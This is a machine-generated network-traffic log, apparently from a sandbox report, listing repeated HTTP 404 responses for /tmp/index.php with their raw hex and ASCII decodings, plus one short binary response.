Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:27:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
